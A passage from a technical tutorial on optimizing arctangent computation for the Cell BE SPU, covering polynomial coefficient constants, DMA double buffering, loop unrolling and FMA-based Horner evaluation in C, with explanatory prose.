<span class="hljs-function"><span class="hljs-keyword">static</span> <span class="hljs-keyword">inline</span> qword <span class="hljs-title">cp_flpio2</span><span class="hljs-params">(<span class="hljs-keyword">void</span>)</span> </span>{ <span class="hljs-keyword">return</span> si_lqa((<span class="hljs-keyword">intptr_t</span>)&amp;_cp_f_pio2); }
<span class="hljs-function"><span class="hljs-keyword">static</span> <span class="hljs-keyword">inline</span> qword <span class="hljs-title">cp_flpt66</span><span class="hljs-params">(<span class="hljs-keyword">void</span>)</span> </span>{ <span class="hljs-keyword">return</span> si_lqa((<span class="hljs-keyword">intptr_t</span>)&amp;_cp_f_pt66); }
<span class="hljs-function"><span class="hljs-keyword">static</span> <span class="hljs-keyword">inline</span> qword <span class="hljs-title">cp_flpi</span><span class="hljs-params">(<span class="hljs-keyword">void</span>)</span> </span>{ <span class="hljs-keyword">return</span> si_lqa((<span class="hljs-keyword">intptr_t</span>)&amp;_cp_f_pi); }
<span class="hljs-function"><span class="hljs-keyword">static</span> <span class="hljs-keyword">inline</span> qword <span class="hljs-title">cp_flnpi</span><span class="hljs-params">(<span class="hljs-keyword">void</span>)</span> </span>{ <span class="hljs-keyword">return</span> si_lqa((<span class="hljs-keyword">intptr_t</span>)&amp;_cp_f_npi); }
<span class="hljs-function"><span class="hljs-keyword">static</span> <span class="hljs-keyword">inline</span> qword <span class="hljs-title">cp_filzero</span><span class="hljs-params">(<span class="hljs-keyword">void</span>)</span> </span>{ <span class="hljs-keyword">return</span> si_ilhu((<span class="hljs-keyword">int16_t</span>)<span class="hljs-number">0x0000</span>); }
<span class="hljs-function"><span class="hljs-keyword">static</span> <span class="hljs-keyword">inline</span> qword <span class="hljs-title">cp_filnzero</span><span class="hljs-params">(<span class="hljs-keyword">void</span>)</span> </span>{ <span class="hljs-keyword">return</span> si_ilhu((<span class="hljs-keyword">int16_t</span>)<span class="hljs-number">0x8000</span>); }
<span class="hljs-function"><span class="hljs-keyword">static</span> <span class="hljs-keyword">inline</span> qword <span class="hljs-title">cp_filone</span><span class="hljs-params">(<span class="hljs-keyword">void</span>)</span> </span>{ <span class="hljs-keyword">return</span> si_ilhu((<span class="hljs-keyword">int16_t</span>)<span class="hljs-number">0x3f80</span>); }
<span class="hljs-function"><span class="hljs-keyword">static</span> <span class="hljs-keyword">inline</span> qword <span class="hljs-title">cp_filtwo</span><span class="hljs-params">(<span class="hljs-keyword">void</span>)</span> </span>{ <span class="hljs-keyword">return</span> si_ilhu((<span class="hljs-keyword">int16_t</span>)<span class="hljs-number">0x4000</span>); }
<span class="hljs-function"><span class="hljs-keyword">static</span> <span class="hljs-keyword">inline</span> qword <span class="hljs-title">cp_filinf</span><span class="hljs-params">(<span class="hljs-keyword">void</span>)</span> </span>{ <span class="hljs-keyword">return</span> si_ilhu((<span class="hljs-keyword">int16_t</span>)<span class="hljs-number">0x7f80</span>); }
<span class="hljs-function"><span class="hljs-keyword">static</span> <span class="hljs-keyword">inline</span> qword <span class="hljs-title">cp_filninf</span><span class="hljs-params">(<span class="hljs-keyword">void</span>)</span> </span>{ <span class="hljs-keyword">return</span> si_ilhu((<span class="hljs-keyword">int16_t</span>)<span class="hljs-number">0xff80</span>); }
<span class="hljs-function"><span class="hljs-keyword">static</span> <span class="hljs-keyword">inline</span> qword <span class="hljs-title">cp_filnan</span><span class="hljs-params">(<span class="hljs-keyword">void</span>)</span> </span>{ <span class="hljs-keyword">return</span> si_ilhu((<span class="hljs-keyword">int16_t</span>)<span class="hljs-number">0x7fc0</span>); }

<span class="hljs-comment">// Numerator polynomial coefficients for the cp_fatan approximation</span>
<span class="hljs-keyword">static</span> <span class="hljs-keyword">const</span> <span class="hljs-built_in">vector</span> <span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">int</span> _cp_f_atan_p7 = { <span class="hljs-number">0x3c08876a</span>, <span class="hljs-number">0x3c08876a</span>, <span class="hljs-number">0x3c08876a</span>, <span class="hljs-number">0x3c08876a</span> };
<span class="hljs-keyword">static</span> <span class="hljs-keyword">const</span> <span class="hljs-built_in">vector</span> <span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">int</span> _cp_f_atan_p6 = { <span class="hljs-number">0xbd954629</span>, <span class="hljs-number">0xbd954629</span>, <span class="hljs-number">0xbd954629</span>, <span class="hljs-number">0xbd954629</span> };
<span class="hljs-keyword">static</span> <span class="hljs-keyword">const</span> <span class="hljs-built_in">vector</span> <span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">int</span> _cp_f_atan_p5 = { <span class="hljs-number">0x3f8a07c1</span>, <span class="hljs-number">0x3f8a07c1</span>, <span class="hljs-number">0x3f8a07c1</span>, <span class="hljs-number">0x3f8a07c1</span> };
<span class="hljs-keyword">static</span> <span class="hljs-keyword">const</span> <span class="hljs-built_in">vector</span> <span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">int</span> _cp_f_atan_p4 = { <span class="hljs-number">0xbf49eee6</span>, <span class="hljs-number">0xbf49eee6</span>, <span class="hljs-number">0xbf49eee6</span>, <span class="hljs-number">0xbf49eee6</span> };
<span class="hljs-keyword">static</span> <span class="hljs-keyword">const</span> <span class="hljs-built_in">vector</span> <span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">int</span> _cp_f_atan_p3 = { <span class="hljs-number">0x3ee4f8b5</span>, <span class="hljs-number">0x3ee4f8b5</span>, <span class="hljs-number">0x3ee4f8b5</span>, <span class="hljs-number">0x3ee4f8b5</span> };
<span class="hljs-keyword">static</span> <span class="hljs-keyword">const</span> <span class="hljs-built_in">vector</span> <span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">int</span> _cp_f_atan_p2 = { <span class="hljs-number">0xbf62365c</span>, <span class="hljs-number">0xbf62365c</span>, <span class="hljs-number">0xbf62365c</span>, <span class="hljs-number">0xbf62365c</span> };
<span class="hljs-keyword">static</span> <span class="hljs-keyword">const</span> <span class="hljs-built_in">vector</span> <span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">int</span> _cp_f_atan_p1 = { <span class="hljs-number">0x3f490965</span>, <span class="hljs-number">0x3f490965</span>, <span class="hljs-number">0x3f490965</span>, <span class="hljs-number">0x3f490965</span> };
<span class="hljs-keyword">static</span> <span class="hljs-keyword">const</span> <span class="hljs-built_in">vector</span> <span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">int</span> _cp_f_atan_p0 = { <span class="hljs-number">0xbf2697e0</span>, <span class="hljs-number">0xbf2697e0</span>, <span class="hljs-number">0xbf2697e0</span>, <span class="hljs-number">0xbf2697e0</span> };

<span class="hljs-comment">// Denominator polynomial coefficients for the cp_fatan approximation</span>
<span class="hljs-keyword">static</span> <span class="hljs-keyword">const</span> <span class="hljs-built_in">vector</span> <span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">int</span> _cp_f_atan_q7 = { <span class="hljs-number">0x3c0897d0</span>, <span class="hljs-number">0x3c0897d0</span>, <span class="hljs-number">0x3c0897d0</span>, <span class="hljs-number">0x3c0897d0</span> };
<span class="hljs-keyword">static</span> <span class="hljs-keyword">const</span> <span class="hljs-built_in">vector</span> <span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">int</span> _cp_f_atan_q6 = { <span class="hljs-number">0xbd890e31</span>, <span class="hljs-number">0xbd890e31</span>, <span class="hljs-number">0xbd890e31</span>, <span class="hljs-number">0xbd890e31</span> };
<span class="hljs-keyword">static</span> <span class="hljs-keyword">const</span> <span class="hljs-built_in">vector</span> <span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">int</span> _cp_f_atan_q5 = { <span class="hljs-number">0x3f6c4616</span>, <span class="hljs-number">0x3f6c4616</span>, <span class="hljs-number">0x3f6c4616</span>, <span class="hljs-number">0x3f6c4616</span> };
<span class="hljs-keyword">static</span> <span class="hljs-keyword">const</span> <span class="hljs-built_in">vector</span> <span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">int</span> _cp_f_atan_q4 = { <span class="hljs-number">0xbf2bbfc2</span>, <span class="hljs-number">0xbf2bbfc2</span>, <span class="hljs-number">0xbf2bbfc2</span>, <span class="hljs-number">0xbf2bbfc2</span> };
<span class="hljs-keyword">static</span> <span class="hljs-keyword">const</span> <span class="hljs-built_in">vector</span> <span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">int</span> _cp_f_atan_q3 = { <span class="hljs-number">0x3eb6679b</span>, <span class="hljs-number">0x3eb6679b</span>, <span class="hljs-number">0x3eb6679b</span>, <span class="hljs-number">0x3eb6679b</span> };
<span class="hljs-keyword">static</span> <span class="hljs-keyword">const</span> <span class="hljs-built_in">vector</span> <span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">int</span> _cp_f_atan_q2 = { <span class="hljs-number">0xbf56c0c9</span>, <span class="hljs-number">0xbf56c0c9</span>, <span class="hljs-number">0xbf56c0c9</span>, <span class="hljs-number">0xbf56c0c9</span> };
<span class="hljs-keyword">static</span> <span class="hljs-keyword">const</span> <span class="hljs-built_in">vector</span> <span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">int</span> _cp_f_atan_q1 = { <span class="hljs-number">0x3f7df927</span>, <span class="hljs-number">0x3f7df927</span>, <span class="hljs-number">0x3f7df927</span>, <span class="hljs-number">0x3f7df927</span> };
<span class="hljs-keyword">static</span> <span class="hljs-keyword">const</span> <span class="hljs-built_in">vector</span> <span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">int</span> _cp_f_atan_q0 = { <span class="hljs-number">0xbf800000</span>, <span class="hljs-number">0xbf800000</span>, <span class="hljs-number">0xbf800000</span>, <span class="hljs-number">0xbf800000</span> };
</code></pre>
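<p>The constants above are stored as raw IEEE 754 bit patterns, which makes them hard to read at a glance. As a host-side sanity check (a portable sketch, not SPU code; the helper names are made up for illustration), the bit patterns can be reinterpreted as floats. The second helper mimics what <code>si_ilhu</code> produces in each word, assuming the usual "immediate load halfword upper" behaviour of placing the 16-bit immediate in the upper half of the word and zeroing the lower half:</p>
<pre><code class="lang-c">#include &lt;stdint.h&gt;
#include &lt;string.h&gt;

/* Reinterprets a 32-bit pattern as a single-precision float. */
static float bits_to_float(uint32_t bits)
{
    float value;
    memcpy(&amp;value, &amp;bits, sizeof value); /* well-defined type punning */
    return value;
}

/* Host-side model of one word produced by ilhu: imm in the upper 16 bits. */
static float ilhu_as_float(uint16_t imm)
{
    return bits_to_float((uint32_t)imm &lt;&lt; 16);
}
</code></pre>
<p>For instance, <code>bits_to_float(0x40490fdb)</code> is the single-precision value of π, <code>0x3f490fdb</code> is π/4, and <code>ilhu_as_float(0x3f80)</code> is exactly 1.0. Only the constants whose lower 16 bits are zero can be built with a single <code>si_ilhu</code>, which is presumably why the others are loaded from memory.</p>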
<p>In <a target="_blank" href="https://jucetize.weebly.com/uploads/3/7/2/0/37200949/cellbe-best-programming-20091211.pdf">programming for the CELL SPE</a>, it is crucial to ensure memory alignment, as the Cell BE's DMA operations and SIMD instructions often require 16-byte alignment for optimal efficiency. Explicit data transfer management between the main memory and the LS must be handled by the programmer using DMA operations, which involves initiating transfers, waiting for completion, and synchronizing data to ensure consistency. Implementing double buffering can overlap computation with data transfer, hiding latency and improving performance. Prefetching data into the LS ahead of time reduces latency and ensures that the SPU has continuous access to the required data. Synchronization primitives such as barriers and signals are essential to maintain data consistency between the LS and the main memory, as well as between different SPEs.</p>
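<p>The alignment and size rules can be captured in a few small helpers. This is a portable sketch under stated assumptions: it takes the commonly documented MFC constraints (16-byte aligned addresses, sizes that are a multiple of 16 bytes, at most 16 KB per DMA command) as given, and the helper names are hypothetical rather than part of any SDK:</p>
<pre><code class="lang-c">#include &lt;stddef.h&gt;
#include &lt;stdint.h&gt;

#define DMA_ALIGNMENT 16u    /* bytes; assumed alignment requirement */
#define DMA_MAX_BYTES 16384u /* bytes; assumed per-command limit (16 KB) */

/* True when the address sits on a 16-byte boundary. */
static int is_dma_aligned(const void *ptr)
{
    return ((uintptr_t)ptr % DMA_ALIGNMENT) == 0;
}

/* Rounds a byte count up to the next multiple of 16. */
static size_t round_up_dma(size_t bytes)
{
    return (bytes + DMA_ALIGNMENT - 1) / DMA_ALIGNMENT * DMA_ALIGNMENT;
}

/* Number of DMA commands needed to move the (rounded-up) byte count. */
static size_t dma_commands_needed(size_t bytes)
{
    return (round_up_dma(bytes) + DMA_MAX_BYTES - 1) / DMA_MAX_BYTES;
}
</code></pre>
<p>A buffer of 128 quadwords is 2048 bytes, so it fits in a single command, while anything above 16 KB has to be split into several commands, typically issued under the same tag.</p>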
<h2 id="heading-going-further-to-direct-memory-access">Going Further to Direct Memory Access</h2>
<p>Double buffering for DMA (Direct Memory Access) is a technique that overlaps data transfers with computation, improving the efficiency of a system, particularly on the CELL BE architecture. Since each SPU can only work on data held in its Local Store (LS), and that data must be explicitly moved between the LS and the main memory using DMA operations, the time spent waiting for those transfers is a natural target for optimization.</p>
<p>In double buffering, two buffers are used alternately to transfer and process data. While one buffer is being processed by the SPU, the other buffer is being filled with new data from the main memory. This technique ensures that the SPU can continue processing without waiting for data transfers to complete, thereby hiding the latency of memory operations and increasing overall throughput.</p>
<ol>
<li><p><strong>Buffer Initialization</strong>: Two buffers, <code>buffer0</code> and <code>buffer1</code>, are allocated in the LS. Pointers <code>current_buffer</code> and <code>next_buffer</code> are used to manage these buffers.</p>
</li>
<li><p><strong>Initial DMA Transfer</strong>: The <code>dma_transfer</code> function is called to initiate the first DMA transfer, filling <code>current_buffer</code> with data from the main memory.</p>
</li>
<li><p><strong>Processing and Overlapping Transfer</strong>: While the SPU processes the data in <code>current_buffer</code>, the next DMA transfer fills <code>next_buffer</code> with the subsequent data chunk. This overlap minimizes idle time.</p>
</li>
<li><p><strong>Swapping Buffers</strong>: After processing the <code>current_buffer</code>, the results are written back to the main memory. The buffers and DMA tags are then swapped, and the process repeats.</p>
</li>
</ol>
<pre><code class="lang-c"><span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> BUFFER_SIZE 128 <span class="hljs-comment">// Qwords per LS buffer</span></span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> PAIRS_PER_BUFFER (BUFFER_SIZE / 2) <span class="hljs-comment">// Each element is a (y, x) pair of qwords</span></span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> TAG 1 <span class="hljs-comment">// Base DMA tag</span></span>

<span class="hljs-comment">// Blocking DMA read: start the transfer, then wait for its tag group</span>
<span class="hljs-function"><span class="hljs-keyword">void</span> <span class="hljs-title">dma_transfer</span><span class="hljs-params">(qword *buffer, <span class="hljs-keyword">uint32_t</span> ea, <span class="hljs-keyword">int</span> tag)</span> </span>{
    mfc_get(buffer, ea, BUFFER_SIZE * <span class="hljs-keyword">sizeof</span>(qword), tag, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>);
    mfc_write_tag_mask(<span class="hljs-number">1</span> &lt;&lt; tag);
    mfc_read_tag_status_all();
}

<span class="hljs-comment">// Double buffering for DMA transfers (assumes num_elements is a multiple of PAIRS_PER_BUFFER)</span>
<span class="hljs-function"><span class="hljs-keyword">void</span> <span class="hljs-title">process_with_double_buffering</span><span class="hljs-params">(<span class="hljs-keyword">uint32_t</span> ea_data, <span class="hljs-keyword">uint32_t</span> ea_result, <span class="hljs-keyword">int</span> num_elements)</span> </span>{
    qword buffer0[BUFFER_SIZE] __attribute__((aligned(<span class="hljs-number">16</span>)));
    qword buffer1[BUFFER_SIZE] __attribute__((aligned(<span class="hljs-number">16</span>)));
    qword *current_buffer = buffer0;
    qword *next_buffer = buffer1;
    <span class="hljs-keyword">int</span> current_tag = TAG;
    <span class="hljs-keyword">int</span> next_tag = TAG + <span class="hljs-number">1</span>;

    <span class="hljs-comment">// Initial DMA transfer (blocking: nothing to process until it lands)</span>
    dma_transfer(current_buffer, ea_data, current_tag);

    <span class="hljs-keyword">for</span> (<span class="hljs-keyword">int</span> i = <span class="hljs-number">0</span>; i &lt; num_elements; i += PAIRS_PER_BUFFER) {
        <span class="hljs-comment">// Start next DMA transfer without waiting, so it overlaps with processing</span>
        <span class="hljs-keyword">if</span> (i + PAIRS_PER_BUFFER &lt; num_elements) {
            mfc_get(next_buffer, ea_data + (i + PAIRS_PER_BUFFER) * <span class="hljs-number">2</span> * <span class="hljs-keyword">sizeof</span>(qword), BUFFER_SIZE * <span class="hljs-keyword">sizeof</span>(qword), next_tag, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>);
        }

        <span class="hljs-comment">// Process current buffer: pair j occupies qwords 2j (y) and 2j + 1 (x)</span>
        <span class="hljs-keyword">for</span> (<span class="hljs-keyword">int</span> j = <span class="hljs-number">0</span>; j &lt; PAIRS_PER_BUFFER; ++j) {
            qword y = current_buffer[j * <span class="hljs-number">2</span>];
            qword x = current_buffer[j * <span class="hljs-number">2</span> + <span class="hljs-number">1</span>];
            qword result = _cp_fatan2(y, x);
            current_buffer[j] = result;
        }

        <span class="hljs-comment">// Write results back and wait, so the buffer can be refilled safely</span>
        mfc_put(current_buffer, ea_result + i * <span class="hljs-keyword">sizeof</span>(qword), PAIRS_PER_BUFFER * <span class="hljs-keyword">sizeof</span>(qword), current_tag, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>);
        mfc_write_tag_mask(<span class="hljs-number">1</span> &lt;&lt; current_tag);
        mfc_read_tag_status_all();

        <span class="hljs-comment">// Swap buffers and tags</span>
        qword *temp_buffer = current_buffer;
        current_buffer = next_buffer;
        next_buffer = temp_buffer;
        <span class="hljs-keyword">int</span> temp_tag = current_tag;
        current_tag = next_tag;
        next_tag = temp_tag;

        <span class="hljs-comment">// Wait for the prefetched chunk before the next iteration reads it</span>
        mfc_write_tag_mask(<span class="hljs-number">1</span> &lt;&lt; current_tag);
        mfc_read_tag_status_all();
    }
}
</code></pre>
<p>The buffers are aligned using <code>__attribute__((aligned(16)))</code> to ensure proper alignment for both DMA transfers and SIMD (Single Instruction, Multiple Data) operations. The SPU loads and stores whole 16-byte quadwords, so aligned data can be moved with a single memory access per vector. Misaligned data needs extra loads and shuffles, which adds overhead and reduces the efficiency of SIMD instructions.</p>
<p>Then, the <code>dma_transfer</code> function performs the first DMA transfer, loading data from the main memory into <code>current_buffer</code>. The function uses <code>mfc_get</code> to initiate the transfer and <code>mfc_write_tag_mask</code> and <code>mfc_read_tag_status_all</code> to select the DMA tag group and block until the transfer completes. Blocking is fine here, since there is nothing to process until the first chunk has arrived.</p>
<p>Inside the loop, the next transfer into <code>next_buffer</code> is started with a bare <code>mfc_get</code>, without waiting, whenever there are more elements to process (<code>i + PAIRS_PER_BUFFER &lt; num_elements</code>). The SPU then processes <code>current_buffer</code> while that transfer is in flight. Each input element is a (y, x) pair of quadwords, so a buffer of <code>BUFFER_SIZE</code> quadwords holds <code>PAIRS_PER_BUFFER</code> pairs, and the results are packed into the front of the same buffer.</p>
<p>After processing <code>current_buffer</code>, the results are written back to the main memory using <code>mfc_put</code>, and the code waits on the tag so that the buffer can be safely reused. The buffers and tags are then swapped, so that the next iteration of the loop processes the newly loaded data.</p>
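<p>The ping-pong control flow is easy to get wrong, so it can help to test it on a host machine first. The following is a portable sketch, not SPU code: <code>fake_dma_get</code> and <code>fake_dma_put</code> are hypothetical stand-ins built on <code>memcpy</code>, so nothing actually overlaps, and the "processing" is a simple doubling of each value instead of atan2. It only demonstrates the buffer indexing, the swap, and the handling of a partial last chunk:</p>
<pre><code class="lang-c">#include &lt;stddef.h&gt;
#include &lt;string.h&gt;

#define CHUNK 4 /* elements per buffer; hypothetical, tiny for illustration */

/* Stand-ins for mfc_get / mfc_put: plain synchronous copies (assumption). */
static void fake_dma_get(float *ls, const float *main_mem, size_t count)
{
    memcpy(ls, main_mem, count * sizeof *ls);
}

static void fake_dma_put(float *main_mem, const float *ls, size_t count)
{
    memcpy(main_mem, ls, count * sizeof *ls);
}

/* Length of the next chunk: CHUNK, or whatever is left at the tail. */
static size_t chunk_len(size_t remaining)
{
    return remaining &lt; CHUNK ? remaining : CHUNK;
}

/* Doubles every element of src into dst using two ping-pong buffers. */
static void double_buffered_scale(const float *src, float *dst, size_t count)
{
    float buf[2][CHUNK];
    int cur = 0;

    if (count == 0) {
        return;
    }
    fake_dma_get(buf[cur], src, chunk_len(count)); /* initial fill */

    for (size_t i = 0; i &lt; count; i += CHUNK) {
        const size_t n = chunk_len(count - i);

        /* "Prefetch" the following chunk into the idle buffer. */
        if (i + CHUNK &lt; count) {
            fake_dma_get(buf[1 - cur], src + i + CHUNK, chunk_len(count - i - CHUNK));
        }

        /* Process the current buffer in place. */
        for (size_t j = 0; j &lt; n; ++j) {
            buf[cur][j] *= 2.0f;
        }

        fake_dma_put(dst + i, buf[cur], n); /* write results back */
        cur = 1 - cur;                      /* swap buffer roles */
    }
}
</code></pre>
<p>Calling <code>double_buffered_scale</code> on ten input values exercises two full chunks and one partial chunk. On the SPU, the two stand-ins would be replaced by tagged <code>mfc_get</code> and <code>mfc_put</code> commands plus the corresponding tag waits.</p>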
<h2 id="heading-loop-unrolling-through-parallelism">Loop Unrolling through Parallelism</h2>
<p>Loop unrolling is an optimization technique used to enhance the performance of loops by decreasing the loop control overhead and increasing the instruction-level parallelism. This technique involves replicating the loop body multiple times within a single iteration, thereby reducing the number of iterations and allowing more operations to be executed in parallel.</p>
<p>Consider a loop that processes one element per iteration:</p>
<pre><code class="lang-c"><span class="hljs-keyword">for</span> (<span class="hljs-keyword">int</span> i = <span class="hljs-number">0</span>; i &lt; n; ++i) {
    process(data[i]);
}
</code></pre>
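<p>If we unroll this loop by a factor of 4, the loop body is replicated four times and the loop control instructions are adjusted accordingly. A short remainder loop handles the last few elements when n is not a multiple of 4:</p>
<pre><code class="lang-c"><span class="hljs-keyword">int</span> i = <span class="hljs-number">0</span>;
<span class="hljs-comment">// Main unrolled loop: four elements per iteration</span>
<span class="hljs-keyword">for</span> (; i + <span class="hljs-number">3</span> &lt; n; i += <span class="hljs-number">4</span>) {
    process(data[i]);
    process(data[i + <span class="hljs-number">1</span>]);
    process(data[i + <span class="hljs-number">2</span>]);
    process(data[i + <span class="hljs-number">3</span>]);
}
<span class="hljs-comment">// Remainder loop: the last n % 4 elements</span>
<span class="hljs-keyword">for</span> (; i &lt; n; ++i) {
    process(data[i]);
}
</code></pre>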
<p>By doing this, the number of iterations is reduced by a factor of 4, thus reducing the loop control overhead (incrementing the counter and checking the loop condition) and exposing more opportunities for parallel execution.</p>
<p>Loop unrolling enhances the efficiency of the double buffering technique by minimizing the overhead of loop control operations and increasing the degree of parallelism. This is particularly beneficial in the CELL BE architecture, where the SPU can take advantage of SIMD instructions to process multiple data points concurrently.</p>
<p>Here’s how loop unrolling can be applied in the code:</p>
<pre><code class="lang-c"><span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> BUFFER_SIZE 128</span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> PAIRS_PER_BUFFER (BUFFER_SIZE / 2) <span class="hljs-comment">// Each element is a (y, x) pair of qwords</span></span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> TAG 1</span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> UNROLL_FACTOR 4</span>

<span class="hljs-comment">// Assumes num_elements is a multiple of PAIRS_PER_BUFFER</span>
<span class="hljs-function"><span class="hljs-keyword">void</span> <span class="hljs-title">doublebuff</span><span class="hljs-params">(<span class="hljs-keyword">uint32_t</span> ea_data, <span class="hljs-keyword">uint32_t</span> ea_result, <span class="hljs-keyword">int</span> num_elements)</span> </span>{
    qword buffer0[BUFFER_SIZE] __attribute__((aligned(<span class="hljs-number">16</span>)));
    qword buffer1[BUFFER_SIZE] __attribute__((aligned(<span class="hljs-number">16</span>)));
    qword *current_buffer = buffer0;
    qword *next_buffer = buffer1;
    <span class="hljs-keyword">int</span> current_tag = TAG;
    <span class="hljs-keyword">int</span> next_tag = TAG + <span class="hljs-number">1</span>;

    <span class="hljs-comment">// Initial DMA transfer</span>
    dma_transfer(current_buffer, ea_data, current_tag);

    <span class="hljs-keyword">for</span> (<span class="hljs-keyword">int</span> i = <span class="hljs-number">0</span>; i &lt; num_elements; i += PAIRS_PER_BUFFER) {
        <span class="hljs-comment">// Prefetch the next chunk without waiting</span>
        <span class="hljs-keyword">if</span> (i + PAIRS_PER_BUFFER &lt; num_elements) {
            mfc_get(next_buffer, ea_data + (i + PAIRS_PER_BUFFER) * <span class="hljs-number">2</span> * <span class="hljs-keyword">sizeof</span>(qword), BUFFER_SIZE * <span class="hljs-keyword">sizeof</span>(qword), next_tag, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>);
        }

        <span class="hljs-comment">// Process current buffer, unrolled by UNROLL_FACTOR (4)</span>
        <span class="hljs-keyword">for</span> (<span class="hljs-keyword">int</span> j = <span class="hljs-number">0</span>; j &lt; PAIRS_PER_BUFFER; j += UNROLL_FACTOR) {
            <span class="hljs-comment">// Four (y, x) pairs; all inputs are read before any result is stored</span>
            <span class="hljs-keyword">const</span> qword *in = &amp;current_buffer[j * <span class="hljs-number">2</span>];
            qword r0 = _cp_fatan2(in[<span class="hljs-number">0</span>], in[<span class="hljs-number">1</span>]);
            qword r1 = _cp_fatan2(in[<span class="hljs-number">2</span>], in[<span class="hljs-number">3</span>]);
            qword r2 = _cp_fatan2(in[<span class="hljs-number">4</span>], in[<span class="hljs-number">5</span>]);
            qword r3 = _cp_fatan2(in[<span class="hljs-number">6</span>], in[<span class="hljs-number">7</span>]);
            current_buffer[j] = r0;
            current_buffer[j + <span class="hljs-number">1</span>] = r1;
            current_buffer[j + <span class="hljs-number">2</span>] = r2;
            current_buffer[j + <span class="hljs-number">3</span>] = r3;
        }

        mfc_put(current_buffer, ea_result + i * <span class="hljs-keyword">sizeof</span>(qword), PAIRS_PER_BUFFER * <span class="hljs-keyword">sizeof</span>(qword), current_tag, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>);
        mfc_write_tag_mask(<span class="hljs-number">1</span> &lt;&lt; current_tag);
        mfc_read_tag_status_all();

        qword *temp_buffer = current_buffer;
        current_buffer = next_buffer;
        next_buffer = temp_buffer;
        <span class="hljs-keyword">int</span> temp_tag = current_tag;
        current_tag = next_tag;
        next_tag = temp_tag;

        <span class="hljs-comment">// Wait for the prefetched chunk before the next iteration reads it</span>
        mfc_write_tag_mask(<span class="hljs-number">1</span> &lt;&lt; current_tag);
        mfc_read_tag_status_all();
    }
}
</code></pre>
<p>The buffers are allocated in the LS and aligned to 16-byte boundaries for efficient DMA and SIMD operations. The first DMA transfer fills <code>current_buffer</code> with data from the main memory. Inside the loop, the processing step is unrolled by a factor of 4: each iteration issues four independent <code>_cp_fatan2</code> evaluations and only then stores the four results. This cuts the number of iterations to a quarter, reduces loop overhead, and gives the compiler independent work that it can interleave across the SPU's two issue pipelines. After processing <code>current_buffer</code>, the results are written back to the main memory, and the buffers are swapped for the next iteration.</p>
<h2 id="heading-polynomial-approximation-through-fused-multiply-add-fma-operations">Polynomial Approximation Through Fused Multiply-Add (FMA) Operations</h2>
<p>Now we can start getting into the mathematics of it all. It starts with computing the arctangent of a vector of four single-precision floating-point values (a scalar input is simply one lane of that vector) using a rational polynomial approximation. The numerator and denominator polynomials are evaluated separately in x² using chains of Fused Multiply-Add (FMA) instructions, and the numerator is then divided by the denominator to obtain the final result. Each chain is a Horner-style nesting rather than a full Estrin split, but since the numerator and denominator chains do not depend on each other, their FMAs can still be interleaved in the pipeline.</p>
<pre><code class="lang-c"><span class="hljs-keyword">const</span> qword xp2 = si_fm(range_x, range_x);
<span class="hljs-keyword">const</span> qword znum0 = f_atan_p0;
<span class="hljs-keyword">const</span> qword znum1 = si_fma(znum0, xp2, f_atan_p1); <span class="hljs-comment">// FMA: (znum0 * xp2) + f_atan_p1</span>
<span class="hljs-keyword">const</span> qword znum2 = si_fma(znum1, xp2, f_atan_p2); <span class="hljs-comment">// FMA: (znum1 * xp2) + f_atan_p2</span>
<span class="hljs-keyword">const</span> qword znum3 = si_fma(znum2, xp2, f_atan_p3); <span class="hljs-comment">// FMA: (znum2 * xp2) + f_atan_p3</span>
<span class="hljs-keyword">const</span> qword znum = si_fma(znum3, xp2, f_atan_p4); <span class="hljs-comment">// FMA: (znum3 * xp2) + f_atan_p4</span>
<span class="hljs-keyword">const</span> qword zden0 = si_fa(xp2, f_atan_q0);
<span class="hljs-keyword">const</span> qword zden1 = si_fma(zden0, xp2, f_atan_q1); <span class="hljs-comment">// FMA: (zden0 * xp2) + f_atan_q1</span>
<span class="hljs-keyword">const</span> qword zden2 = si_fma(zden1, xp2, f_atan_q2); <span class="hljs-comment">// FMA: (zden1 * xp2) + f_atan_q2</span>
<span class="hljs-keyword">const</span> qword zden3 = si_fma(zden2, xp2, f_atan_q3); <span class="hljs-comment">// FMA: (zden2 * xp2) + f_atan_q3</span>
<span class="hljs-keyword">const</span> qword zden = si_fma(zden3, xp2, f_atan_q4); <span class="hljs-comment">// FMA: (zden3 * xp2) + f_atan_q4</span>
</code></pre>
<p>A polynomial of degree n can be written as</p>
<pre><code class="lang-plaintext">P(x) = a₀ + a₁x + a₂x² + ... + aₙxⁿ
     = a₀ + x(a₁ + x(a₂ + ... + x(aₙ₋₁ + xaₙ)))
</code></pre>
<p>This representation allows the polynomial to be evaluated using nested multiplication and addition operations, with each level of nesting corresponding to a higher power of x. In the <code>_cp_fatan</code> implementation, the numerator polynomial is evaluated as:</p>
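<p>$$znum = p_4 + z \cdot (p_3 + z \cdot (p_2 + z \cdot (p_1 + z \cdot p_0)))$$</p><p>Similarly, the denominator polynomial is evaluated as:</p>
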